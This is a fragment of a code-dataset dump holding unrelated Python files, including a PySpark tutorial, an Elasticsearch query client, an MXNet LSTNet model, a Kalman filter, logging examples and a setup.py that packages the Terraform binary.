random.shuffle(validMoves)\n for move in validMoves:\n [newx, newy] = getNewPosition([self.x, self.y], move)\n posString = str(newx) + \",\" + str(newy)\n if posString in antBoard and (antBoard[posString] == State.EMPTY or antBoard[posString] == State.COLONY):\n if backtrack or posString not in self.visitedOnThisTrip:\n self.visitedOnThisTrip.append(posString)\n return move\n if (validMoves == []):\n # There really should be a better solution than juts randomly moving.\n validMoves = self.getValidMoves()\n if (tunnelsOnly):\n #This can get stuck\n #do over, but don't try to go towards the goal at all\n #this code was copied from above (refactor?)\n validMoves = self.getValidMoves()\n random.shuffle(validMoves)\n for move in validMoves:\n [newx, newy] = getNewPosition([self.x, self.y], move)\n posString = str(newx) + \",\" + str(newy)\n if posString in antBoard and (antBoard[posString] == State.EMPTY or antBoard[posString] == State.COLONY):\n if backtrack or posString not in self.visitedOnThisTrip:\n self.visitedOnThisTrip.append(posString)\n return move\n\n return random.choice(validMoves)\n\n def getValidMoves(self):\n moves = []\n if self.x > 0:\n moves.append('W')\n # Am I off by one here?\n if self.x < self.boardWidth:\n moves.append('E')\n if self.y > 0:\n moves.append('S')\n if self.y < self.boardHeight:\n moves.append('N')\n return 
moves\n\n","sub_path":"ant.py","file_name":"ant.py","file_ext":"py","file_size_in_byte":9925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"442118355","text":"import os\nimport yaml\n\n\nclass Configuration(object):\n \"\"\"Loads a yaml configuration file.\"\"\"\n\n def __init__(self):\n self.config = self.load()\n\n def _get(self, key_components):\n \"\"\"Low-level method to look up a key in a dictionary.\"\"\"\n value = self.config\n for k in key_components:\n value = value[k]\n return value\n\n def get(self, key, default=None):\n \"\"\"Get the configuration for a specific variable, using dots as\n delimiters for nested objects.\n :param key: Key in the config to lookup\n :type key: str\n :param default: Default value to return if key is not in the config.\n :type default: str\n \"\"\"\n key_components = key.split('.')\n try:\n return self._get(key_components)\n except KeyError:\n return default\n\n def load(self):\n \"\"\"Loads the configuration file.\"\"\"\n if os.environ.get('ENVIRONMENT') == 'production':\n env_path = 'config/production.yaml'\n else:\n env_path = os.environ.get('CONFIG_ENV') or 'config/dev.yaml'\n if not os.path.exists(env_path):\n raise Exception('{0} does not exist'.format(env_path))\n\n stream = open(env_path, 'r')\n return yaml.safe_load(stream)\n\n\nconfig = Configuration()\n","sub_path":"xword/utils/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"237870434","text":"import mxnet as mx\nfrom mxnet import nd, gluon, autograd\nfrom mxnet.gluon import nn, rnn\n\nclass LSTNet(gluon.Block):\n \"\"\"\n LSTNet auto-regressive block\n \"\"\"\n def __init__(self, num_series, conv_hid, gru_hid, skip_gru_hid, skip, ar_window):\n super(LSTNet, self).__init__()\n kernel_size = 6\n dropout_rate = 0.2\n self.skip = skip\n self.ar_window = ar_window\n with self.name_scope():\n self.conv = nn.Conv1D(conv_hid, kernel_size=kernel_size, layout='NCW', activation='relu')\n self.dropout = nn.Dropout(dropout_rate)\n self.gru = rnn.GRU(gru_hid, layout='TNC')\n self.skip_gru = rnn.GRU(skip_gru_hid, layout='TNC')\n self.fc = nn.Dense(num_series)\n self.ar_fc = nn.Dense(1)\n\n def forward(self, x):\n \"\"\"\n :param nd.NDArray x: input data in NTC layout (N: batch-size, T: sequence len, C: channels)\n :return: output of LSTNet in NC layout\n :rtype nd.NDArray\n \"\"\"\n # Convolution\n c = self.conv(x.transpose((0, 2, 1))) # Transpose NTC to to NCT (a.k.a NCW) before convolution\n c = self.dropout(c)\n\n # GRU\n r = self.gru(c.transpose((2, 0, 1))) # Transpose NCT to TNC before GRU\n r = r[-1] # Only keep the last output\n r = self.dropout(r) # Now in NC layout\n\n # Skip GRU\n # Slice off multiples of skip from convolution output\n skip_c = c[:, :, -(c.shape[2] // self.skip) * self.skip:]\n skip_c = skip_c.reshape((c.shape[0], c.shape[1], -1, self.skip)) # Reshape to NCT x skip\n skip_c = skip_c.transpose((2, 0, 3, 1)) # Transpose to T x N x skip x C\n skip_c = skip_c.reshape((skip_c.shape[0], -1, skip_c.shape[3])) # Reshape to Tx (Nxskip) x C\n s = self.skip_gru(skip_c)\n s = s[-1] # Only keep the last output (now in (Nxskip) x C layout)\n s = s.reshape((x.shape[0], -1)) # Now in N x (skipxC) layout\n\n # FC layer\n fc = self.fc(nd.concat(r, s)) # NC layout\n\n # Autoregressive highway\n ar_x = x[:, -self.ar_window:, :] # NTC layout\n ar_x = ar_x.transpose((0, 2, 1)) # NCT layout\n ar_x 
= ar_x.reshape((-1, ar_x.shape[2])) # (NC) x T layout\n ar = self.ar_fc(ar_x)\n ar = ar.reshape((x.shape[0], -1)) # NC layout\n\n # Add autoregressive and fc outputs\n res = fc + ar\n return res\n","sub_path":"lab4_2_lstnet_distributed_multi_gpu/lstnet.py","file_name":"lstnet.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"363283480","text":"import json\nfilepath = r'C:\\Users\\huayu\\Desktop\\python-exercise\\10.4\\num.txt'\ntry:\n with open(filepath) as file_object:\n num = json.load(file_object)\n print(\"I know your favorite number is :\" + num)\nexcept FileNotFoundError:\n num = input(\"please enter a number: \")\n with open(filepath, 'w') as file_object:\n json.dump(num, file_object)","sub_path":"10.文件和异常/10.4/load_dump.py","file_name":"load_dump.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"273247948","text":"from parla import Parla\nfrom parla.cpu import cpu\nfrom parla.tasks import spawn, TaskSpace\n\ndef different_taskspace_dependency():\n first_task = TaskSpace(\"FirstTask\")\n @spawn(first_task, memory=2000)\n def t0():\n print(\"\\tTask[0]\")\n\n # Spawns a task on the different task space\n # from the first task which is dependent on\n # the first task.\n second_task = TaskSpace(\"SecondTask\")\n @spawn(second_task, [first_task])\n def t1():\n print(\"\\tTask[1]\")\n # Return the last task.\n return second_task\n\nif __name__ == \"__main__\":\n with Parla():\n print(\"Two simple tasks started\")\n different_taskspace_dependency()\n","sub_path":"examples/simple/simple_two_tasks.py","file_name":"simple_two_tasks.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"74771579","text":"import findspark\nfindspark.init('/home/dienbui/spark-2.2.0-bin-hadoop2.7')\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructField, StringType, IntegerType, StructType\nfrom pyspark.sql.functions import countDistinct, avg, stddev, format_number, mean\nfrom pyspark.sql.functions import (dayofmonth, dayofyear,\n hour, month,\n year, weekofyear,\n format_number, date_format)\n\nspark = SparkSession.builder.appName('Basics').getOrCreate()\ndf = spark.read.json('people.json')\ndf.show()\ndf.printSchema()\ndf.columns\ndf.describe()\ndf.describe().show()\n\ndata_schema = [StructField('age', IntegerType(), True),\n StructField('name', StringType(), True)]\nfinal_struct = StructType(fields=data_schema)\ndf = spark.read.json('people.json', schema=final_struct)\ndf.printSchema()\n\nprint(df['age'])\nprint(type(df['age']))\nprint(df.select('age'))\ndf.select('age').show()\ndf.head(2)\ndf.select(['age', 'name']).show()\n\ndf.withColumn(('newage'), df['age']).show()\ndf.withColumn('double_age', df['age'] * 2).show()\ndf.createOrReplaceTempView('people')\nresults = spark.sql('SELECT * FROM people').show()\nnew_result = spark.sql('SELECT * FROM people where age = 30').show()\n\n# BASIC OPERATIONS\n\ndf = spark.read.csv('appl_stock.csv', inferSchema=True, header=True)\ndf.filter('Close < 500').show()\ndf.filter('Close < 500').select('Open').show()\ndf.filter(df['Close'] < 500).select('Volume').show()\ndf.filter((df['Close'] < 200) & (df['Open'] > 200)).show()\nresult = df.filter(df['Low'] == 197.16).collect()\nrow = result[0]\nrow.asDict()\n\n# GROUPBY AND 
AGGREGATE\n\ndf.groupBy('Company').mean().show()\n# +-------+-----------------+\n# |Company| avg(Sales)|\n# +-------+-----------------+\n# | APPL| 370.0|\n# | GOOG| 220.0|\n# | FB| 610.0|\n# | MSFT|322.3333333333333|\n# +-------+-----------------+\n\ndf.groupBy('Company').sum().show()\ndf.groupBy('Company').min().show()\ndf.groupBy('Company').max().show()\ndf.groupBy('Company').count().show()\n\ndf.agg({'Sales': 'sum'}).show()\n# +----------+\n# |sum(Sales)|\n# +----------+\n# | 4327.0|\n# +----------+\n\ngroup_data = df.groupBy('Company')\ngroup_data.agg({'Sales': 'max'}).show()\n# +-------+----------+\n# |Company|max(Sales)|\n# +-------+----------+\n# | APPL| 750.0|\n# | GOOG| 340.0|\n# | FB| 870.0|\n# | MSFT| 600.0|\n# +-------+----------+\n\ndf.select(countDistinct('Sales')).show()\n# +---------------------+\n# |count(DISTINCT Sales)|\n# +---------------------+\n# | 11|\n# +---------------------+\n\ndf.select(avg('Sales').alias('Average Sales')).show()\n# +-----------------+\n# | Average Sales|\n# +-----------------+\n# |360.5833333333333|\n# +-----------------+\n\ndf.select(stddev('Sales')).show()\n# +------------------+\n# |stddev_samp(Sales)|\n# +------------------+\n# |250.08742410799007|\n# +------------------+\n\n\nsales_std = df.select(stddev('Sales').alias('std'))\nsales_std.select(format_number('std', 2)).show()\n# +---------------------+\n# |format_number(std, 2)|\n# +---------------------+\n# | 250.09|\n# +---------------------+\n\ndf.orderBy('Sales').show()\n# +-------+-------+-----+\n# |Company| Person|Sales|\n# +-------+-------+-----+\n# | GOOG|Charlie|120.0|\n# | MSFT| Amy|124.0|\n# | APPL| Linda|130.0|\n# | GOOG| Sam|200.0|\n# | MSFT|Vanessa|243.0|\n# | APPL| John|250.0|\n# | GOOG| Frank|340.0|\n# | FB| Sarah|350.0|\n# | APPL| Chris|350.0|\n# | MSFT| Tina|600.0|\n# | APPL| Mike|750.0|\n# | FB| Carl|870.0|\n# +-------+-------+-----+\n\ndf.orderBy(df['Sales'].desc()).show()\n# +-------+-------+-----+\n# |Company| Person|Sales|\n# +-------+-------+-----+\n# | FB| Carl|870.0|\n# | APPL| Mike|750.0|\n# | MSFT| Tina|600.0|\n# | FB| Sarah|350.0|\n# | APPL| Chris|350.0|\n# | GOOG| Frank|340.0|\n# | APPL| John|250.0|\n# | MSFT|Vanessa|243.0|\n# | GOOG| Sam|200.0|\n# | APPL| Linda|130.0|\n# | MSFT| Amy|124.0|\n# | GOOG|Charlie|120.0|\n# +-------+-------+-----+\n\n# MISSING DATA\n\n# Display rows with at least 2 non-null values\ndf.na.drop(thresh=2).show()\n# get rows with no null value\ndf.na.drop(how='any').show()\n# don't drop any row\ndf.na.drop(how='all').show()\n# drop rows with null data in Sales\ndf.na.drop(subset=['Sales']).show()\n# Fill in any string value\ndf.na.fill('FILL VALUE').show()\n# Fill in any null num value\ndf.na.fill(0).show()\n# Fill all null in Name column\ndf.na.fill('No Name', subset=['Name']).show()\n\nmean_val = df.select(mean(df['Sales'])).collect()\nmean_sales = mean_val[0][0]\ndf.na.fill(mean_sales, subset=['Sales']).show()\n\n# TIMESTAMP\n\ndf.select(dayofmonth(df['Date'])).show()\n","sub_path":"dataframe_part_1/data_frame.py","file_name":"data_frame.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"466134967","text":"from elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import query, aggs, function\nimport logging\nimport time\n\n\n# query parameter structure\nclass Parameter(object):\n def __init__(self):\n self.query = dict()\n self.query['exact_query'] = False\n self.set_order('__connectTime','desc')\n\n def list_all_members(self):\n for name,value in vars(self).items():\n print('%s=%s'%(name,value))\n\n def return_all_members(self):\n L = []\n for name,value in vars(self).items():\n L.append('%s=%s'%(name,value))\n return L\n\n def set_time(self, begin, end, time_format=None):\n # time range and time format; the format defaults to yyyy-MM-dd\n self.query['begin_time'] = begin\n self.query['end_time'] = end\n self.query['format'] = 'yyyy-MM-dd'\n if time_format is not None:\n self.query['time_format'] = time_format\n self.query['exact_query'] = False\n\n def set_from_size(self, from_, size):\n self.query['from'] = from_\n self.query['size'] = size\n\n def set_match_str(self, qstr):\n # the query text typed into the search box\n self.query['match_str'] = qstr\n\n def set_order(self, order, orderType):\n \"\"\"\n Ordering is currently either by mining time or by the default relevance-score mode.\n :param order: pass the string __connectTime to sort by time; pass __bornTime for the default\n :return:\n \"\"\"\n self.query['order'] = order\n self.query['orderType'] = orderType\n\n # action type: http,im,netdisk,email,filetransfer,other,csmp,docaudit,website\n def set_actionType(self,actionType):\n self.query['__actionType'] = actionType\n\n # platform\n def set_platform(self,platform):\n self.query['__platform'] = platform\n\n\n def set_industry(self, industry):\n # industry names, passed as a list\n if isinstance(industry, list) is False:\n print(\"industry input must be list!!\")\n self.query['industry'] = industry\n\n def set_document(self, document):\n # document layout name\n self.query['document'] = document\n\n def set_security(self, security):\n # security classification\n self.query['security'] = security\n\n def set_alarm_key(self, alarmkey):\n # alarm keywords, passed as a list\n if isinstance(alarmkey, list) is False:\n print(\"alarmkey input must be list\")\n self.query['alarmKey'] = alarmkey\n\n def set_exact_query(self, exact_query):\n # whether to use exact query syntax: true for exact, false otherwise\n self.query['exact_query'] = exact_query\n\n def set_extention(self, extention):\n # file extension\n self.query['extention'] = extention\n\nclass ESClient(object):\n def __init__(self, hosts, log):\n self.es = Elasticsearch(hosts=hosts)\n\n self.log = log\n\n def search_yth_base(self, params):\n self.log.debug('进入 search_yth_base 函数,%s'%params.return_all_members())\n\n # #####################filter conditions###############################\n filter_query = query.MatchAll()\n # date range\n date_query = query.Range(_expand__to_dot=False, __connectTime={\n 'gte': params.query['begin_time'],\n 'lte': params.query['end_time'], 'format': params.query['format']})\n filter_query = filter_query & date_query\n\n # action type\n if '__actionType' in params.query:\n filter_query = filter_query & query.Term(_expand__to_dot=False,\n __actionType=params.query['__actionType'])\n\n\n\n # #####################query conditions###############################\n match_query = query.MatchAll()\n highlight_query = query.MatchAll()\n if 'match_str' in params.query:\n qs = params.query['match_str']\n if params.query['exact_query']:\n qs = '\\\"' + qs + '\\\"'\n highlight_query = match_query & query.QueryString(\n default_field=\"__full_query\",\n query=qs\n )\n match_query = match_query & (\n query.QueryString(\n default_field=\"__full_query\",\n query=qs\n ) | query.QueryString(\n default_field=\"__summary\",\n query=qs\n )\n )\n\n # #####################highlighting###############################\n highlight = {\n \"pre_tags\": [\n \"<em>\"\n ],\n \"post_tags\": [\n \"</em>\"\n ],\n \"fields\": {\n \"__summary\": {\n \"highlight_query\": highlight_query.to_dict()\n }\n }\n }\n\n # #####################aggregations###############################\n actionType_agg = aggs.Filter(query.Bool(must_not=query.Match(_expand__to_dot=False, __actionType='')))\n actionType_agg.bucket('actionType', 'terms', field='__actionType', size=30)\n\n\n # the query body\n all_query = {\n \"bool\": {\n \"must\": match_query.to_dict(),\n \"filter\": filter_query.to_dict()\n }\n }\n\n # sort, either by connect time or by collection time\n sort = []\n if 'order' in params.query:\n if params.query['order'] == '__connectTime':\n self.log.debug('按接入时间排序')\n sort = [\n {\n \"__connectTime\": {\n \"order\": params.query['orderType']\n }\n }]\n elif params.query['order'] == '__bornTime':\n self.log.debug('按采集时间排序')\n sort = [\n {\n \"__bornTime\": {\n \"order\": params.query['orderType']\n }\n }]\n\n\n # combine the query, aggregations and sort into one body\n body = {\n \"aggs\": {\n \"actionType_agg\": actionType_agg.to_dict()\n },\n \"query\": all_query,\n 'sort': sort,\n \"highlight\": highlight\n }\n self.log.debug('使用查询语句:{0},从es中搜索数据'.format(body))\n return self.es.search('yth_base', 'mytype', body,\n size=params.query['size'],\n from_=params.query['from']\n )\n\n\n\nif __name__ == '__main__':\n log_file = \"./es_logger.log.py\"\n logging.basicConfig(filename=log_file, level=logging.DEBUG)\n es_client = ESClient('192.168.10.136:9200', logging)\n parameter = Parameter()\n parameter.set_match_str('国家保密局')\n parameter.set_time('2019-05-16', '2019-05-21')\n parameter.set_from_size(0, 10)\n print(parameter.return_all_members())\n print(es_client.search_yth_base(parameter))\n","sub_path":"_bak/es_test.py","file_name":"es_test.py","file_ext":"py","file_size_in_byte":6982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"154938998","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 10 14:39:48 2016\r\n\r\n@author: Oos\r\n\"\"\"\r\n\r\n\"\"\"kalman filter 1 D starts\"\"\"\r\n\r\ndef update(mean1, var1, mean2, var2):\r\n new_mean = float(var2 * mean1 + var1 * mean2) / (var1 + var2)\r\n new_var = 1./(1./var1 + 1./var2)\r\n return [new_mean, new_var]\r\n\r\ndef predict(mean1, var1, mean2, var2):\r\n new_mean = mean1 + mean2\r\n new_var = var1 + var2\r\n return [new_mean, new_var]\r\n\r\nmeasurements = [5., 6., 7., 9., 10.]\r\nmotion = [1., 1., 2., 1., 1.]\r\nmeasurement_sig = 4.\r\nmotion_sig = 2.\r\nmu = 0.\r\nsig = 10000.\r\n\r\n#Please print out ONLY the final values of the mean\r\n#and the variance in a list [mu, sig]. \r\n\r\nfor step in range(len(motion)):\r\n mu, sig = update(mu, sig, measurements[step], measurement_sig)\r\n mu, sig = predict(mu, sig, motion[step], motion_sig)\r\n\r\nprint [mu, sig]\r\n\r\n\"\"\"kalman filter 1 D ends\"\"\"","sub_path":"update vairance and mean for move and sens.py","file_name":"update vairance and mean for move and sens.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"213665562","text":"import argparse\n# from operator import itemgetter\n# from itertools import groupby\n# from Bio import AlignIO\n# from Bio.Alphabet import generic_dna\n# from Bio.Align import MultipleSeqAlignment\n# from Bio.Nexus import Nexus\n\n\n\n#set up the arguments parser to deal with the command line input\nparser = argparse.ArgumentParser(description = \"Categorises SNPs to include or exclude based on whether they fall within the boundaries file and outputs these to file. Also, spits out a new alignment reduced to the 'include' sites for downstream processing.\")\nparser.add_argument('-s', '--site_boundaries', help = \"site boundaries file, csv. 
each row contains sxxxxxtoyyyy\", required = True)\nparser.add_argument('-o', '--output_prefix', help = \"prefix to be placed in file name\", required = True)\n\nargs = parser.parse_args()\n\n\n\n#iunsert the list here\ndef get_unique(boundaries, prefix):\n\twith open(boundaries) as input_handle:\n\t\tblocks_sig = [line.rstrip(\"\\n\") for line in input_handle]\n\t\tblocks_sig_conv = []\n\t\tblocks_sig_int = []\n\t\tfor i in blocks_sig:\n\t\t\tx = i.replace(\"s\",\"\").replace(\"to\",\",\").split(\",\")\n\t\t\tblocks_sig_conv.append(x)\n\t\tfor i in blocks_sig_conv:\n\t\t\ti = map(int, i)\n\t\t\tif i not in blocks_sig_int:\n\t\t\t\tblocks_sig_int.append(i)\n\t\tblocks_sig_int.sort()\n\t\twith open(prefix+\"BlocksSigUnique.txt\", 'w') as output_handle:\n\t\t\toutput_handle.write(\"Start,Stop\\n\")\n\t\t\tfor i in blocks_sig_int:\n\t\t\t\toutput_handle.write(str(i).replace(\"[\",\"\").replace(\"]\",\"\").replace(\" \",\"\")+'\\n')\n\nget_unique(args.site_boundaries, args.output_prefix)\n","sub_path":"GetUniqueBlocks.py","file_name":"GetUniqueBlocks.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"43587966","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nfrom flask import Flask,render_template\napp=Flask(__name__)\n@app.route(\"/\")\ndef start():\n name=\"liningsheg\"\n return render_template('index.html',name=name)\nif __name__=='__main__':\n app.run(host=\"0.0.0.0\",port=5000,debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103789316","text":"# Download the Python helper library from twilio.com/docs/python/install\nfrom twilio.rest import Client\n\n# Your Account Sid and Auth Token from twilio.com/user/account\naccount_sid = \"ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\nauth_token = \"your_auth_token\"\nclient = Client(account_sid, auth_token)\n\ndata = {'number': \"001\", 'name': \"Bulbasaur\", 'attack': 49}\n\nlist_item = client.sync \\\n .services(\"ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\") \\\n .sync_lists(\"MyCollection\") \\\n .sync_list_items \\\n .create(data=data)\n\nprint(list_item.data)\n","sub_path":"sync/rest/lists/create-list-item/create-list-item.6.x.py","file_name":"create-list-item.6.x.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"54267381","text":"# -*- coding: utf-8 -*-\n# Copyright © 2015 Carl Chenet \n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see \n\nfrom distutils.core import setup\nimport os.path\nimport platform\nimport sys\n\n# Warn the user about the supported Python versions\nif float(platform.python_version()[0:3]) < 3.4:\n print('You need at least Python 3.4 to use BackupChecker')\n sys.exit(1)\n\nCLASSIFIERS = [\n 'Intended Audience :: System Administrators',\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'License :: OSI Approved :: GNU General Public License (GPL)',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 3.4'\n]\n\nsetup(name = 'aom',\n version = '0.1',\n license = 'GNU GPL v3',\n description = 'converts a running Debian system to a Ansible role',\n long_description = 'ansible-o-matic converts a running Debian system to a Ansible role',\n classifiers = CLASSIFIERS,\n author = 'Carl Chenet',\n author_email = 'chaica@ohmytux.com',\n url = 'https://github.com/chaica/ansible-o-matic',\n download_url = 'https://github.com/chaica/ansible-o-matic',\n packages = ['aom'],\n data_files=[(os.path.join('share','man','man1'), ['man/aom.1'])],\n scripts = ['scripts/aom']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"350311079","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom blog.models import UserProfile\n\n\ndef words_validator(comment):\n if len(comment) < 1:\n raise ValidationError('一个字都不说不太好吧!')\n\n\ndef comment_validator(comment):\n INVALID_WORDS = ['傻b', '傻逼', '脑残', 'sb', '尼玛', '妈']\n if any(comment.__contains__(word) for word in INVALID_WORDS):\n raise ValidationError('艹,想骂人是不是!')\n\n\nclass CommentForm(forms.Form):\n comment = forms.CharField(widget=forms.Textarea(),\n error_messages={\n 'required': '一个字都不说不太好吧!'\n },\n validators=[words_validator, comment_validator]\n )\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField()\n password = forms.CharField()\n\n\nclass UserProfileForm(forms.ModelForm):\n error_css_class = 'error'\n\n class Meta:\n model = UserProfile\n fields = [\n 'profile_image', 'gender'\n ]\n\n labels = {\n 'profile_image': 'Image',\n 'gender': 'Gender',\n }\n\n widgets = {\n 'profile_image': forms.FileInput(\n attrs={'class': 'ui input'},\n )\n }\n","sub_path":"blog/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"171711062","text":"#!/usr/bin/env python3\n\nimport sys\nfrom collections import Counter\nimport argparse\nimport functools\nimport math\n\nparser = argparse.ArgumentParser(description='Process some integers.')\nparser.add_argument('-v', dest=\"verbose\", default=False, action='store_true',\n help='Verbose output')\nparser.add_argument('--data', dest=\"data\", help='Specify data as an argument')\n\nargs = parser.parse_args()\n\nif args.data == None:\n buffer = sys.stdin.buffer.read()\nelse:\n buffer = args.data \ncounter = Counter(buffer)\n\nprobability = {}\nlength = len(buffer)\nfor key, value in counter.items():\n probability[key] = value/float(length)\n\nentropy = -sum(p* math.log(p, 2) for p in probability.values())\nif entropy == -0.0:\n entropy = 0\n\nif args.verbose != None:\n print(f\"{entropy}:{buffer.decode()}\")\nelse:\n 
print(entropy)\n","sub_path":"zsh/scripts/sentropy.py","file_name":"sentropy.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"603149718","text":"#!/usr/bin/env python\nimport os\nimport stat\nimport sys\nimport urllib.request\nimport zipfile\nimport platform\nfrom setuptools import setup\n\nVERSION = '1.0.1'\nTERRAFORM_VERSION = '0.12.6'\n\nwith open('README.md') as f:\n readme = f.read()\n\ndef download_terraform(platform='linux'):\n base_url = f'https://releases.hashicorp.com/terraform/{TERRAFORM_VERSION}'\n file_name = f'terraform_{TERRAFORM_VERSION}_{platform}_amd64.zip'\n download_url = f'{base_url}/{file_name}'\n\n download_directory = 'downloads'\n extract_directory = 'lib'\n target_file = f'{download_directory}/{file_name}'\n\n os.makedirs(download_directory, exist_ok=True)\n os.makedirs(extract_directory, exist_ok=True)\n\n if not os.path.exists(target_file):\n urllib.request.urlretrieve(download_url, target_file)\n\n with zipfile.ZipFile(target_file) as terraform_zip_archive:\n terraform_zip_archive.extractall(extract_directory)\n\n if platform == 'windows': \n new_executable_path = f'{extract_directory}/terraform_{platform}.exe'\n old_executable_path = f'{extract_directory}/terraform.exe'\n else:\n new_executable_path = f'{extract_directory}/terraform_{platform}'\n old_executable_path = f'{extract_directory}/terraform'\n\n if os.path.exists(new_executable_path):\n os.remove(new_executable_path)\n os.rename(old_executable_path, new_executable_path )\n\n executable_stat = os.stat(new_executable_path)\n os.chmod(new_executable_path, executable_stat.st_mode | stat.S_IEXEC)\n\ndownload_terraform(platform='linux')\ndownload_terraform(platform='windows')\ndownload_terraform(platform='darwin')\n\ntry:\n from wheel.bdist_wheel import bdist_wheel as _bdist_wheel\n class bdist_wheel(_bdist_wheel):\n def finalize_options(self):\n _bdist_wheel.finalize_options(self)\n self.root_is_pure = False\nexcept ImportError:\n bdist_wheel = None\n\nsetup(\n name='terraform-bin',\n version=VERSION,\n long_description=readme,\n long_description_content_type='text/markdown',\n author='Epiphany Team',\n author_email='',\n url='https://github.com/epiphany-platform/terraform-bin',\n license='Apache License Version 2.0',\n py_modules=['terraform'],\n data_files=[\n ('lib', ['lib/terraform_linux', 'lib/terraform_darwin', 'lib/terraform_windows.exe']),\n ],\n entry_points={\n 'console_scripts': [\n 'terraform = terraform:main',\n ]\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"198591462","text":"# #!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/11/18 5:43 下午\n# @Author : 百变金刚\n# @Content : logging basic record\n# @Reference: https://www.cnblogs.com/Eva-J/articles/7228075.html#_label14\n# output2console; output2file; remove in time\nimport logging\nimport time\nfrom logging.handlers import TimedRotatingFileHandler\n\nimport yaml\n\n# 级别\t何时使用\n# DEBUG\t详细信息,一般只在调试问题时使用。(>=该level的log info将被输出)\n# INFO\t证明事情按预期工作。\n# WARNING\t(默认)某些没有预料到的事件的提示,或者在将来可能会出现的问题提示。例如:磁盘空间不足。但是软件还是会照常运行。\n# ERROR\t由于更严重的问题,软件已不能执行一些功能了。\n# CRITICAL\t严重错误,表明软件已不能继续运行了。\n\n# handler配置level不能生效\n# 在创建 handler之前将默认root logger的handler拉低\n# logging.root.setLevel(logging.NOTSET)\n\ndef test2Terminal():\n logging.basicConfig(format='%(asctime)s - %(pathname)s[line:%(lineno)d] - 
%(levelname)s: %(message)s',\n level=logging.DEBUG)\n logging.debug('debug 信息')\n logging.info('info 信息')\n logging.warning('warning 信息')\n logging.error('error 信息')\n logging.critical('critial 信息')\n\ndef test2File():\n logging.basicConfig(\n level=logging.DEBUG,#控制台打印的日志级别\n filename='new.log',\n filemode='w',##模式,有w和a,w就是写模式,每次都会重新写日志,覆盖之前的日志\n #a是追加模式,默认如果不写的话,就是追加模式\n format='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'\n #日志格式\n )\n logging.debug('debug 信息')\n logging.info('info 信息')\n logging.warning('warning 信息')\n logging.error('error 信息')\n logging.critical('critial 信息')\n\ndef testBoth():\n # !!! name, 指定了那么才会重新生成一个,不指定默认就只有一个(root)\n # logging的操作实际上是通过一个 logging.root 的对象的操作,level不过不指定默认为warning\n # 对于logging.getLogger(), 如果不显性的指定一个name,则默认返回logging.root 默认level为warning\n # 在对logger对象添加handler,且handler指定了level,Logger对logger的level的设置规则为选择更高级别的level,那么如果handler的级别低,则无法生效\n # 解决方法就是在自定义之前把logging,也就是logging.root的level设置为低级别,那么最终级别将取决于设定的handler\n # logging.root.setLevel(logging.NOTEST)\n # 有者将其封装进一个对象,该对象可以即又\n\n # 创建一个logger\n id=1\n logger = logging.getLogger('logger_{}'.format(id)) # 如果不指定name将不会新建logger,而是返回一个初始创建的公共logger\n\n # 创建一些设置\n formatter = logging.Formatter('%(levelname)-8s %(name)-12s: %(message)s') # 设置日志打印格式\n # 创建一个handler,用于写入日志文件\n fh = logging.FileHandler('logs/testboth.log')\n\n # 创建一个stream handler,用于输出到控制台\n ch = logging.StreamHandler() # 